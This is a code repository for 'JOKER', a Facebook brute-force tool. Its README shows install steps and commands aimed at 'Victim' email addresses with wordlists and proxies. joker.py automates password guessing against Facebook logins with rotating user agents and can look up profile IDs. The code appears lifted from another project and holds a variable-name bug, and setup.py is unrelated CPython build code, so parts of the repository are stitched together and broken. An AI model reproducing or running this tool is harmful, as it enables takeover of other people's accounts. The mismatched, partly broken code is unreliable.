├── jk.PNG
├── index.html
├── .github
│   ├── FUNDING.yml
│   └── workflows
│       └── python-publish.yml
├── LICENSE
├── README.md
├── joker.py
└── setup.py
/jk.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fikrado/JOKER-burtal-force/HEAD/jk.PNG
--------------------------------------------------------------------------------
/index.html:
--------------------------------------------------------------------------------
1 | JOKER facebook brute force
2 |
3 | I created this tool to be the best Facebook brute force tool.
4 |
--------------------------------------------------------------------------------
/.github/FUNDING.yml:
--------------------------------------------------------------------------------
1 | # These are supported funding model platforms
2 |
3 | github: fikrado
4 | patreon: fikrado
5 | open_collective: # Replace with a single Open Collective username
6 | ko_fi: # Replace with a single Ko-fi username
7 | tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
8 | community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
9 | liberapay: fikrado
10 | issuehunt: # Replace with a single IssueHunt username
11 | otechie: # Replace with a single Otechie username
12 | custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2']
13 |
--------------------------------------------------------------------------------
/.github/workflows/python-publish.yml:
--------------------------------------------------------------------------------
1 | # This workflow will upload a Python Package using Twine when a release is created
2 | # For more information see: https://help.github.com/en/actions/language-and-framework-guides/using-python-with-github-actions#publishing-to-package-registries
3 |
4 | name: Upload Python Package
5 |
6 | on:
7 | release:
8 | types: [created]
9 |
10 | jobs:
11 | deploy:
12 |
13 | runs-on: ubuntu-latest
14 |
15 | steps:
16 | - uses: actions/checkout@v2
17 | - name: Set up Python
18 | uses: actions/setup-python@v2
19 | with:
20 | python-version: '3.x'
21 | - name: Install dependencies
22 | run: |
23 | python -m pip install --upgrade pip
24 | pip install setuptools wheel twine
25 | - name: Build and publish
26 | env:
27 | TWINE_USERNAME: ${{ secrets.PYPI_USERNAME }}
28 | TWINE_PASSWORD: ${{ secrets.PYPI_PASSWORD }}
29 | run: |
30 | python setup.py sdist bdist_wheel
31 | twine upload dist/*
32 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2020 Yahye Abdirahman
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | ## Find Fikrado on:
2 | [GitHub](https://github.com/fikrado)
3 | [Instagram](https://www.instagram.com/mr__yahe)
4 | [Telegram](https://t.me/fikrado_hacker)
5 | [Facebook](https://facebook.com/fikrado4048063)
6 |
7 | # JOKER FACEBOOK BRUTE FORCE ATTACK
8 |
9 | -----------------------------------------------------------------------------------------------
10 | ## A Facebook brute force attack tool that can be used on the following operating systems and applications:
11 | -------------------------------------------------------------------------------------------------
12 | ##### 1: KALI LINUX
13 | ##### 2: ALL LINUX OS
14 | ##### 3: TERMUX
15 | ##### 4: ANY OS WITH PYTHON INSTALLED
16 |
17 |
18 |
19 |
20 | ----------------------------------------------------------------------------
21 | ## HOW TO INSTALL JOKER BRUTE FORCE
22 | ```
23 | apt update
24 |
25 | apt install git -y
26 |
27 | pkg install python python2 && pip2 install requests mechanize
28 |
29 | git clone https://github.com/fikrado/JOKER-burtal-force
30 |
31 | cd JOKER-burtal-force
32 |
33 | python joker.py
34 |
35 | ```
36 | ###
37 |
38 | ------------------------------------------------------------------------------------------
39 | ## HOW TO USE JOKER BRUTE FORCE
40 |
41 |
42 |
43 | ###
44 |
45 | ```
46 | python joker.py -t Victim@gmail.com -w /usr/share/wordlists/rockyou.txt
47 |
48 | python joker.py -t 100001013078780 -w C:\\Users\\Me\\Desktop\\wordlist.txt
49 |
50 | python joker.py -t Victim@hotmail.com -w D:\\wordlist.txt -p 144.217.101.245:3129
51 |
52 | python joker.py -t Victim@gmail.com -s 1234567
53 |
54 | python joker.py -g https://www.facebook.com/Victim_Profile
55 |
56 | ```
57 | ###
58 |
59 |
60 | ________________________
61 |
62 |
63 |
64 | # VIDEO TUTORIAL: HOW TO USE THE TOOL
65 |
66 | [Watch the video tutorial](https://www.youtube.com/watch?v=iecKs0lwvaw)
67 |
68 | ________________________________________________________________
69 | # SCREENSHOT
70 |
71 |
72 |
--------------------------------------------------------------------------------
/joker.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | import socket, sys, os, re, random, optparse, time
4 | if sys.version_info.major <= 2:import httplib
5 | else:import http.client as httplib
6 |
7 | ## COLORS ###############
8 | wi="\033[1;37m" #>>White#
9 | rd="\033[1;31m" #>Red #
10 | gr="\033[1;32m" #>Green #
11 | yl="\033[1;33m" #>Yellow#
12 | #########################
13 | os.system("cls||clear")
14 | def write(text):
15 | sys.stdout.write(text)
16 | sys.stdout.flush()
17 |
18 | versionPath = "core"+os.sep+"version.txt"
19 |
20 | errMsg = lambda msg: write(rd+"\n["+yl+"!"+rd+"] Error: "+yl+msg+rd+ " !!!\n"+wi)
21 |
22 | try:import requests
23 | except ImportError:
24 | errMsg("[ requests ] module is missing")
25 | print(" [*] Please Use: 'pip install requests' to install it :)")
26 | sys.exit(1)
27 |
28 | try:import mechanize
29 | except ImportError:
30 | errMsg("[ mechanize ] module is missing")
31 | print(" [*] Please Use: 'pip install mechanize' to install it :)")
32 | sys.exit(1)
33 |
34 | class FaceBoom(object):
35 |
36 |
37 | def __init__(self):
38 | self.useProxy = None
39 | self.br = mechanize.Browser()
40 | self.br.set_handle_robots(False)
41 | self.br._factory.is_html = True
42 | self.br.addheaders=[('User-agent',random.choice([
43 | 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) RockMelt/0.9.58.494 Chrome/11.0.696.71 Safari/534.24',
44 | 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36',
45 | 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.54 Safari/535.2',
46 | 'Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54',
47 | 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.12 Safari/535.11',
48 | 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.6 (KHTML, like Gecko) Chrome/16.0.897.0 Safari/535.6',
49 | 'Mozilla/5.0 (X11; Linux x86_64; rv:17.0) Gecko/20121202 Firefox/17.0 Iceweasel/17.0.1']))]
50 |
51 |
52 | @staticmethod
53 | def check_proxy(proxy):
54 | proxies = {'https':"https://"+proxy, 'http':"http://"+proxy}
55 | proxy_ip = proxy.split(":")[0]
56 | try:
57 | r = requests.get('https://www.wikipedia.org',proxies=proxies, timeout=5)
58 | if proxy_ip==r.headers['X-Client-IP']: return True
59 | return False
60 | except Exception : return False
61 |
62 |
63 | @staticmethod
64 | def cnet():
65 | try:
66 | socket.create_connection((socket.gethostbyname("www.google.com"), 80), 2)
67 | return True
68 | except socket.error:pass
69 | return False
70 |
71 |
72 | def get_profile_id(self, target_profile):
73 | try:
74 |             print(gr+"\n["+wi+"*"+gr+"] getting target Profile ID... please wait"+wi)
75 | idre = re.compile('"entity_id":"([0-9]+)"')
76 | con = requests.get(target_profile).text
77 | idis = idre.findall(con)
78 | print(wi+"\n["+gr+"+"+wi+"]"+gr+" Target Profile"+wi+" ID: "+yl+idis[0]+wi)
79 | except IndexError:
80 | errMsg("Please Check Your Victim's Profile URL")
81 | sys.exit(1)
82 |
83 |
84 | def login(self,target, password):
85 |
86 | try:
87 | self.br.open("https://facebook.com")
88 | self.br.select_form(nr=0)
89 | self.br.form['email']=target
90 | self.br.form['pass']= password
91 | self.br.method ="POST"
92 | if self.br.submit().get_data().__contains__(b'home_icon'):return 1
93 | elif "checkpoint" in self.br.geturl(): return 2
94 | return 0
95 | except(KeyboardInterrupt, EOFError):
96 | print(rd+"\n["+yl+"!"+rd+"]"+yl+" Aborting"+rd+"..."+wi)
97 | time.sleep(1.5)
98 | sys.exit(1)
99 | except Exception as e:
100 | print(rd+" Error: "+yl+str(e)+wi+"\n")
101 | time.sleep(0.60)
102 |
103 |
104 | def banner(self,target,wordlist,single_passwd):
105 |
106 | proxystatus = gr+self.useProxy+wi+"["+gr+"ON"+wi+"]" if self.useProxy else yl+"["+rd+"OFF"+yl+"]"
107 | print(gr+"""
108 | ==================================
109 | [---] """+wi+"""JOKER BF"""+gr+""" [---]
110 | ==================================
111 | [---] """+wi+"""BruteForce Facebook """+gr+""" [---]
112 | ==================================
113 | [---] """+yl+"""CONFIG"""+gr+""" [---]
114 | ==================================
115 | [>] Target :> """+wi+target+gr+"""
116 | {}""".format("[>] Wordlist :> "+yl+str(wordlist) if not single_passwd else "[>] Password :> "+yl+str(single_passwd))+gr+"""
117 | [>] ProxyStatus :> """+str(proxystatus)+wi)
118 | if not single_passwd:
119 | print(gr+"""\
120 | =================================="""+wi+"""
121 | [~] """+yl+"""Brute"""+rd+""" ForceATTACK: """+gr+"""Enabled """+wi+"""[~]"""+gr+"""
122 | ==================================\n"""+wi)
123 | else:print("\n")
124 |
125 |
126 | @staticmethod
127 | def updateFaceBoom():
128 | if not os.path.isfile(versionPath):
129 | errMsg("Unable to check for updates: please re-clone the script to fix this problem")
130 | sys.exit(1)
131 | write("[~] Checking for updates...\n")
132 | conn = httplib.HTTPSConnection("raw.githubusercontent.com")
133 | conn.request("GET", "/Oseid/FaceBoom/master/core/version.txt")
134 | repoVersion = conn.getresponse().read().strip().decode()
135 | with open(versionPath) as vf:
136 | currentVersion = vf.read().strip()
137 | if repoVersion == currentVersion:write(" [*] The script is up to date!\n")
138 | else:
139 | print(" [+] An update has been found ::: Updating... ")
140 | conn.request("GET", "/Oseid/FaceBoom/master/faceboom.py")
141 | newCode = conn.getresponse().read().strip().decode()
142 | with open("faceboom.py", "w") as faceBoomScript:
143 | faceBoomScript.write(newCode)
144 | with open(versionPath, "w") as ver:
145 | ver.write(repoVersion)
146 | write(" [+] Successfully updated :)\n")
147 |
148 | parse = optparse.OptionParser(wi+"""
149 | Usage: python ./joker.py [OPTIONS...]
150 | -------------
151 | \x1b[1;96m 88 88
152 | \x1b[1;96m "" 88
153 | \x1b[1;96m 88
154 | \x1b[1;96m 88 ,adPPYba, 88 ,d8 ,adPPYba, 8b,dPPYba,
155 | \x1b[1;96m 88 a8" "8a 88 ,a8" a8P_____88 88P' "Y8
156 | \x1b[1;96m 88 8b d8 8888[ 8PP""""""" 88
157 | \x1b[1;96m 88 "8a, ,a8" 88`"Yba, "8b, ,aa 88
158 | \x1b[1;96m 88 `"YbbdP"' 88 `Y8a `"Ybbd8"' 88
159 | \x1b[1;96m ,88
160 | \x1b[1;96m888P"
161 |
162 |
163 | Examples:
164 | |
165 | |--------
166 | | python joker.py -t Victim@gmail.com -w /usr/share/wordlists/rockyou.txt
167 | |--------
168 | | python joker.py -t 100001013078780 -w C:\\Users\\Me\\Desktop\\wordlist.txt
169 | |--------
170 | | python joker.py -t Victim@hotmail.com -w D:\\wordlist.txt -p 144.217.101.245:3129
171 | |--------
172 | | python joker.py -t Victim@gmail.com -s 1234567
173 | |--------
174 | | python joker.py -g https://www.facebook.com/Victim_Profile
175 | |--------
176 | """)
177 |
178 |
179 | def Main():
180 | parse.add_option("-t","--target",'-T','--TARGET',dest="target",type="string",
181 | help="Specify Target Email or ID")
182 | parse.add_option("-w","--wordlist",'-W','--WORDLIST',dest="wordlist",type="string",
183 | help="Specify Wordlist File ")
184 | parse.add_option("-s","--single","--S","--SINGLE",dest="single",type="string",
185 | help="Specify Single Password To Check it")
186 | parse.add_option("-p","-P","--proxy","--PROXY",dest="proxy",type="string",
187 | help="Specify HTTP/S Proxy to be used")
188 | parse.add_option("-g","-G","--getid","--GETID",dest="url",type="string",
189 | help="Specify TARGET FACEBOOK PROFILE URL to get his ID")
190 | parse.add_option("-u","-U","--update","--UPDATE", dest="update", action="store_true", default=False)
191 | (options,args) = parse.parse_args()
192 | faceboom = FaceBoom()
193 | target = options.target
194 | wordlist = options.wordlist
195 | single_passwd = options.single
196 | proxy = options.proxy
197 | target_profile = options.url
198 | update = options.update
199 | opts = [target,wordlist,single_passwd, proxy, target_profile, update]
200 | if any(opt for opt in opts):
201 | if not faceboom.cnet():
202 | errMsg("Please Check Your Internet Connection")
203 | sys.exit(1)
204 | if update:
205 | faceboom.updateFaceBoom()
206 | sys.exit(1)
207 | elif target_profile:
208 | faceboom.get_profile_id(target_profile)
209 | sys.exit(1)
210 | elif wordlist or single_passwd:
211 | if wordlist:
212 | if not os.path.isfile(wordlist):
213 | errMsg("Please check Your Wordlist Path")
214 | sys.exit(1)
215 | if single_passwd:
216 | if len(single_passwd.strip()) < 6:
217 | errMsg("Invalid Password")
218 | print("[!] Password must be at least '6' characters long")
219 | sys.exit(1)
220 | if proxy:
221 | if proxy.count(".") != 3:
222 | errMsg("Invalid IPv4 ["+rd+str(proxy)+yl+"]")
223 | sys.exit(1)
224 | print(wi+"["+yl+"~"+wi+"] Connecting To "+wi+"Proxy[\033[1;33m {} \033[1;37m]...".format(proxy if not ":" in proxy else proxy.split(":")[0]))
225 | final_proxy = proxy+":8080" if not ":" in proxy else proxy
226 | if faceBoom.check_proxy(final_proxy):
227 | faceBoom.useProxy = final_proxy
228 | faceBoom.br.set_proxies({'https':faceBoom.useProxy, 'http':faceBoom.useProxy})
229 | print(wi+"["+gr+"Connected"+wi+"]")
230 | else:
231 | errMsg("Connection Failed")
232 | errMsg("Unable to connect to Proxy["+rd+str(proxy)+yl+"]")
233 | sys.exit(1)
234 |
235 | faceboom.banner(target,wordlist,single_passwd)
236 | loop,passwords = (1,open(wordlist).readlines()) if not single_passwd else ("~",[single_passwd])
237 | for passwd in passwords:
238 | passwd = passwd.strip()
239 | if len(passwd) <6:continue
240 | write(wi+"["+yl+str(loop)+wi+"] Trying Password[ {"+yl+str(passwd)+wi+"} ]")
241 | retCode = faceboom.login(target, passwd)
242 | if retCode:
243 | sys.stdout.write(wi+" ==> Login"+gr+" Success\n")
244 | print(wi+"========================="+"="*len(passwd)+"======")
245 | print(wi+"["+gr+"+"+wi+"] Password [ "+gr+passwd+wi+" ]"+gr+" Is Correct :)")
246 | print(wi+"========================="+"="*len(passwd)+"======")
247 |                     if retCode == 2:print(wi+"["+yl+"!"+wi+"]"+yl+" Warning: This account uses ("+rd+"2FA - Two-Factor Authentication"+yl+"):"+rd+" It's Locked"+yl+" !!!")
248 | break
249 | else:
250 | sys.stdout.write(yl+" ==> Login"+rd+" Failed\n")
251 | loop = loop + 1 if not single_passwd else "~"
252 | else:
253 | if single_passwd:
254 | print(yl+"\n["+rd+"!"+yl+"] Sorry: "+wi+"The Password[ "+yl+passwd+wi+" ] Is Not Correct"+rd+":("+yl+"!"+wi)
255 | print(gr+"["+yl+"!"+gr+"]"+yl+" Please Try Another password or Wordlist "+gr+":)"+wi)
256 | else:
257 | print(yl+"\n["+rd+"!"+yl+"] Sorry: "+wi+"I Can't Find The Correct Password In [ "+yl+wordlist+wi+" ] "+rd+":("+yl+"!"+wi)
258 | print(gr+"["+yl+"!"+gr+"]"+yl+" Please Try Another Wordlist. "+gr+":)"+wi)
259 | sys.exit(1)
260 | else:
261 | print(parse.usage)
262 | sys.exit(1)
263 |
264 |
265 | if __name__=='__main__':
266 | Main()
267 |
--------------------------------------------------------------------------------
/setup.py:
--------------------------------------------------------------------------------
1 | import sys, os, imp, re, optparse
2 | from glob import glob
3 | from platform import machine as platform_machine
4 |
5 | from distutils import log
6 | from distutils import sysconfig
7 | from distutils import text_file
8 | from distutils.errors import *
9 | from distutils.core import Extension, setup
10 | from distutils.command.build_ext import build_ext
11 | from distutils.command.install import install
12 | from distutils.command.install_lib import install_lib
13 |
14 | # This global variable is used to hold the list of modules to be disabled.
15 | disabled_module_list = []
16 |
17 | def add_dir_to_list(dirlist, dir):
18 | """Add the directory 'dir' to the list 'dirlist' (at the front) if
19 | 1) 'dir' is not already in 'dirlist'
20 | 2) 'dir' actually exists, and is a directory."""
21 | if dir is not None and os.path.isdir(dir) and dir not in dirlist:
22 | dirlist.insert(0, dir)
23 |
24 | def find_file(filename, std_dirs, paths):
25 | """Searches for the directory where a given file is located,
26 | and returns a possibly-empty list of additional directories, or None
27 | if the file couldn't be found at all.
28 |
29 | 'filename' is the name of a file, such as readline.h or libcrypto.a.
30 | 'std_dirs' is the list of standard system directories; if the
31 | file is found in one of them, no additional directives are needed.
32 | 'paths' is a list of additional locations to check; if the file is
33 | found in one of them, the resulting list will contain the directory.
34 | """
35 |
36 | # Check the standard locations
37 | for dir in std_dirs:
38 | f = os.path.join(dir, filename)
39 | if os.path.exists(f): return []
40 |
41 | # Check the additional directories
42 | for dir in paths:
43 | f = os.path.join(dir, filename)
44 | if os.path.exists(f):
45 | return [dir]
46 |
47 | # Not found anywhere
48 | return None
49 |
50 | def find_library_file(compiler, libname, std_dirs, paths):
51 | result = compiler.find_library_file(std_dirs + paths, libname)
52 | if result is None:
53 | return None
54 |
55 | # Check whether the found file is in one of the standard directories
56 | dirname = os.path.dirname(result)
57 | for p in std_dirs:
58 | # Ensure path doesn't end with path separator
59 | p = p.rstrip(os.sep)
60 | if p == dirname:
61 | return [ ]
62 |
63 | # Otherwise, it must have been in one of the additional directories,
64 | # so we have to figure out which one.
65 | for p in paths:
66 | # Ensure path doesn't end with path separator
67 | p = p.rstrip(os.sep)
68 | if p == dirname:
69 | return [p]
70 | else:
71 | assert False, "Internal error: Path not found in std_dirs or paths"
72 |
73 | def module_enabled(extlist, modname):
74 | """Returns whether the module 'modname' is present in the list
75 | of extensions 'extlist'."""
76 | extlist = [ext for ext in extlist if ext.name == modname]
77 | return len(extlist)
78 |
79 | def find_module_file(module, dirlist):
80 | """Find a module in a set of possible folders. If it is not found
81 | return the unadorned filename"""
82 | list = find_file(module, [], dirlist)
83 | if not list:
84 | return module
85 | if len(list) > 1:
86 | log.info("WARNING: multiple copies of %s found"%module)
87 | return os.path.join(list[0], module)
88 |
89 | class PyBuildExt(build_ext):
90 |
91 | def __init__(self, dist):
92 | build_ext.__init__(self, dist)
93 | self.failed = []
94 |
95 | def build_extensions(self):
96 |
97 | # Detect which modules should be compiled
98 | missing = self.detect_modules()
99 |
100 | # Remove modules that are present on the disabled list
101 | extensions = [ext for ext in self.extensions
102 | if ext.name not in disabled_module_list]
103 | # move ctypes to the end, it depends on other modules
104 | ext_map = dict((ext.name, i) for i, ext in enumerate(extensions))
105 | if "_ctypes" in ext_map:
106 | ctypes = extensions.pop(ext_map["_ctypes"])
107 | extensions.append(ctypes)
108 | self.extensions = extensions
109 |
110 | # Fix up the autodetected modules, prefixing all the source files
111 | # with Modules/ and adding Python's include directory to the path.
112 | (srcdir,) = sysconfig.get_config_vars('srcdir')
113 | if not srcdir:
114 | # Maybe running on Windows but not using CYGWIN?
115 | raise ValueError("No source directory; cannot proceed.")
116 |
117 | # Figure out the location of the source code for extension modules
118 | # (This logic is copied in distutils.test.test_sysconfig,
119 | # so building in a separate directory does not break test_distutils.)
120 | moddir = os.path.join(os.getcwd(), srcdir, 'Modules')
121 | moddir = os.path.normpath(moddir)
122 | srcdir, tail = os.path.split(moddir)
123 | srcdir = os.path.normpath(srcdir)
124 | moddir = os.path.normpath(moddir)
125 |
126 | moddirlist = [moddir]
127 | incdirlist = ['./Include']
128 |
129 | # Platform-dependent module source and include directories
130 | platform = self.get_platform()
131 | if platform in ('darwin', 'mac') and ("--disable-toolbox-glue" not in
132 | sysconfig.get_config_var("CONFIG_ARGS")):
133 | # Mac OS X also includes some mac-specific modules
134 | macmoddir = os.path.join(os.getcwd(), srcdir, 'Mac/Modules')
135 | moddirlist.append(macmoddir)
136 | incdirlist.append('./Mac/Include')
137 |
138 | alldirlist = moddirlist + incdirlist
139 |
140 | # Fix up the paths for scripts, too
141 | self.distribution.scripts = [os.path.join(srcdir, filename)
142 | for filename in self.distribution.scripts]
143 |
144 | # Python header files
145 | headers = glob("Include/*.h") + ["pyconfig.h"]
146 |
147 | for ext in self.extensions[:]:
148 | ext.sources = [ find_module_file(filename, moddirlist)
149 | for filename in ext.sources ]
150 | if ext.depends is not None:
151 | ext.depends = [find_module_file(filename, alldirlist)
152 | for filename in ext.depends]
153 | else:
154 | ext.depends = []
155 | # re-compile extensions if a header file has been changed
156 | ext.depends.extend(headers)
157 |
158 | ext.include_dirs.append( '.' ) # to get config.h
159 | for incdir in incdirlist:
160 | ext.include_dirs.append( os.path.join(srcdir, incdir) )
161 |
162 | # If a module has already been built statically,
163 | # don't build it here
164 | if ext.name in sys.builtin_module_names:
165 | self.extensions.remove(ext)
166 |
167 | if platform != 'mac':
168 | # Parse Modules/Setup and Modules/Setup.local to figure out which
169 | # modules are turned on in the file.
170 | remove_modules = []
171 | for filename in ('Modules/Setup', 'Modules/Setup.local'):
172 | input = text_file.TextFile(filename, join_lines=1)
173 | while 1:
174 | line = input.readline()
175 | if not line: break
176 | line = line.split()
177 | remove_modules.append(line[0])
178 | input.close()
179 |
180 | for ext in self.extensions[:]:
181 | if ext.name in remove_modules:
182 | self.extensions.remove(ext)
183 |
184 | # When you run "make CC=altcc" or something similar, you really want
185 | # those environment variables passed into the setup.py phase. Here's
186 | # a small set of useful ones.
187 | compiler = os.environ.get('CC')
188 | args = {}
189 | # unfortunately, distutils doesn't let us provide separate C and C++
190 | # compilers
191 | if compiler is not None:
192 | (ccshared,cflags) = sysconfig.get_config_vars('CCSHARED','CFLAGS')
193 | args['compiler_so'] = compiler + ' ' + ccshared + ' ' + cflags
194 | self.compiler.set_executables(**args)
195 |
196 | build_ext.build_extensions(self)
197 |
198 | longest = max([len(e.name) for e in self.extensions])
199 | if self.failed:
200 | longest = max(longest, max([len(name) for name in self.failed]))
201 |
202 | def print_three_column(lst):
203 | lst.sort(key=str.lower)
204 | # guarantee zip() doesn't drop anything
205 | while len(lst) % 3:
206 | lst.append("")
207 | for e, f, g in zip(lst[::3], lst[1::3], lst[2::3]):
208 | print "%-*s %-*s %-*s" % (longest, e, longest, f,
209 | longest, g)
210 |
211 | if missing:
212 | print
213 | print "Failed to find the necessary bits to build these modules:"
214 | print_three_column(missing)
215 | print ("To find the necessary bits, look in setup.py in"
216 | " detect_modules() for the module's name.")
217 | print
218 |
219 | if self.failed:
220 | failed = self.failed[:]
221 | print
222 | print "Failed to build these modules:"
223 | print_three_column(failed)
224 | print
225 |
226 | def build_extension(self, ext):
227 |
228 | if ext.name == '_ctypes':
229 | if not self.configure_ctypes(ext):
230 | return
231 |
232 | try:
233 | build_ext.build_extension(self, ext)
234 | except (CCompilerError, DistutilsError), why:
235 | self.announce('WARNING: building of extension "%s" failed: %s' %
236 | (ext.name, sys.exc_info()[1]))
237 | self.failed.append(ext.name)
238 | return
239 | # Workaround for Mac OS X: The Carbon-based modules cannot be
240 | # reliably imported into a command-line Python
241 | if 'Carbon' in ext.extra_link_args:
242 | self.announce(
243 | 'WARNING: skipping import check for Carbon-based "%s"' %
244 | ext.name)
245 | return
246 |
247 | if self.get_platform() == 'darwin' and (
248 | sys.maxint > 2**32 and '-arch' in ext.extra_link_args):
249 | # Don't bother doing an import check when an extension was
250 | # build with an explicit '-arch' flag on OSX. That's currently
251 | # only used to build 32-bit only extensions in a 4-way
252 | # universal build and loading 32-bit code into a 64-bit
253 | # process will fail.
254 | self.announce(
255 | 'WARNING: skipping import check for "%s"' %
256 | ext.name)
257 | return
258 |
259 | # Workaround for Cygwin: Cygwin currently has fork issues when many
260 | # modules have been imported
261 | if self.get_platform() == 'cygwin':
262 | self.announce('WARNING: skipping import check for Cygwin-based "%s"'
263 | % ext.name)
264 | return
265 | ext_filename = os.path.join(
266 | self.build_lib,
267 | self.get_ext_filename(self.get_ext_fullname(ext.name)))
268 | try:
269 | imp.load_dynamic(ext.name, ext_filename)
270 | except ImportError, why:
271 | self.failed.append(ext.name)
272 | self.announce('*** WARNING: renaming "%s" since importing it'
273 | ' failed: %s' % (ext.name, why), level=3)
274 | assert not self.inplace
275 | basename, tail = os.path.splitext(ext_filename)
276 | newname = basename + "_failed" + tail
277 | if os.path.exists(newname):
278 | os.remove(newname)
279 | os.rename(ext_filename, newname)
280 |
281 | # XXX -- This relies on a Vile HACK in
282 | # distutils.command.build_ext.build_extension(). The
283 | # _built_objects attribute is stored there strictly for
284 | # use here.
285 | # If there is a failure, _built_objects may not be there,
286 | # so catch the AttributeError and move on.
287 | try:
288 | for filename in self._built_objects:
289 | os.remove(filename)
290 | except AttributeError:
291 | self.announce('unable to remove files (ignored)')
292 | except:
293 | exc_type, why, tb = sys.exc_info()
294 | self.announce('*** WARNING: importing extension "%s" '
295 | 'failed with %s: %s' % (ext.name, exc_type, why),
296 | level=3)
297 | self.failed.append(ext.name)
298 |
299 | def get_platform(self):
300 | # Get value of sys.platform
301 | for platform in ['cygwin', 'beos', 'darwin', 'atheos', 'osf1']:
302 | if sys.platform.startswith(platform):
303 | return platform
304 | return sys.platform
305 |
306 | def detect_modules(self):
307 | # Ensure that /usr/local is always used
308 | add_dir_to_list(self.compiler.library_dirs, '/usr/local/lib')
309 | add_dir_to_list(self.compiler.include_dirs, '/usr/local/include')
310 |
311 | # Add paths specified in the environment variables LDFLAGS and
312 | # CPPFLAGS for header and library files.
313 | # We must get the values from the Makefile and not the environment
314 | # directly since an inconsistently reproducible issue comes up where
315 |         # the environment variable is not set even though the values were passed
316 | # into configure and stored in the Makefile (issue found on OS X 10.3).
317 | for env_var, arg_name, dir_list in (
318 | ('LDFLAGS', '-R', self.compiler.runtime_library_dirs),
319 | ('LDFLAGS', '-L', self.compiler.library_dirs),
320 | ('CPPFLAGS', '-I', self.compiler.include_dirs)):
321 | env_val = sysconfig.get_config_var(env_var)
322 | if env_val:
323 | # To prevent optparse from raising an exception about any
324 | # options in env_val that it doesn't know about we strip out
325 | # all double dashes and any dashes followed by a character
326 | # that is not for the option we are dealing with.
327 | #
328 | # Please note that order of the regex is important! We must
329 | # strip out double-dashes first so that we don't end up with
330 | # substituting "--Long" to "-Long" and thus lead to "ong" being
331 | # used for a library directory.
332 | env_val = re.sub(r'(^|\s+)-(-|(?!%s))' % arg_name[1],
333 | ' ', env_val)
334 | parser = optparse.OptionParser()
335 | # Make sure that allowing args interspersed with options is
336 | # allowed
337 | parser.allow_interspersed_args = True
338 | parser.error = lambda msg: None
339 | parser.add_option(arg_name, dest="dirs", action="append")
340 | options = parser.parse_args(env_val.split())[0]
341 | if options.dirs:
342 | for directory in reversed(options.dirs):
343 | add_dir_to_list(dir_list, directory)
344 |
345 | if os.path.normpath(sys.prefix) != '/usr':
346 | add_dir_to_list(self.compiler.library_dirs,
347 | sysconfig.get_config_var("LIBDIR"))
348 | add_dir_to_list(self.compiler.include_dirs,
349 | sysconfig.get_config_var("INCLUDEDIR"))
350 |
351 | try:
352 | have_unicode = unicode
353 | except NameError:
354 | have_unicode = 0
355 |
356 | # lib_dirs and inc_dirs are used to search for files;
357 | # if a file is found in one of those directories, it can
358 | # be assumed that no additional -I,-L directives are needed.
359 | lib_dirs = self.compiler.library_dirs + [
360 | '/lib64', '/usr/lib64',
361 | '/lib', '/usr/lib',
362 | ]
363 | inc_dirs = self.compiler.include_dirs + ['/usr/include']
364 | exts = []
365 | missing = []
366 |
367 | config_h = sysconfig.get_config_h_filename()
368 | config_h_vars = sysconfig.parse_config_h(open(config_h))
369 |
370 | platform = self.get_platform()
371 | (srcdir,) = sysconfig.get_config_vars('srcdir')
372 |
373 | # Check for AtheOS which has libraries in non-standard locations
374 | if platform == 'atheos':
375 | lib_dirs += ['/system/libs', '/atheos/autolnk/lib']
376 | lib_dirs += os.getenv('LIBRARY_PATH', '').split(os.pathsep)
377 | inc_dirs += ['/system/include', '/atheos/autolnk/include']
378 | inc_dirs += os.getenv('C_INCLUDE_PATH', '').split(os.pathsep)
379 |
380 | # OSF/1 and Unixware have some stuff in /usr/ccs/lib (like -ldb)
381 | if platform in ['osf1', 'unixware7', 'openunix8']:
382 | lib_dirs += ['/usr/ccs/lib']
383 |
384 | if platform == 'darwin':
385 | # This should work on any unixy platform ;-)
386 | # If the user has bothered specifying additional -I and -L flags
387 | # in OPT and LDFLAGS we might as well use them here.
388 | # NOTE: using shlex.split would technically be more correct, but
389 | # also gives a bootstrap problem. Let's hope nobody uses directories
390 | # with whitespace in the name to store libraries.
391 | cflags, ldflags = sysconfig.get_config_vars(
392 | 'CFLAGS', 'LDFLAGS')
393 | for item in cflags.split():
394 | if item.startswith('-I'):
395 | inc_dirs.append(item[2:])
396 |
397 | for item in ldflags.split():
398 | if item.startswith('-L'):
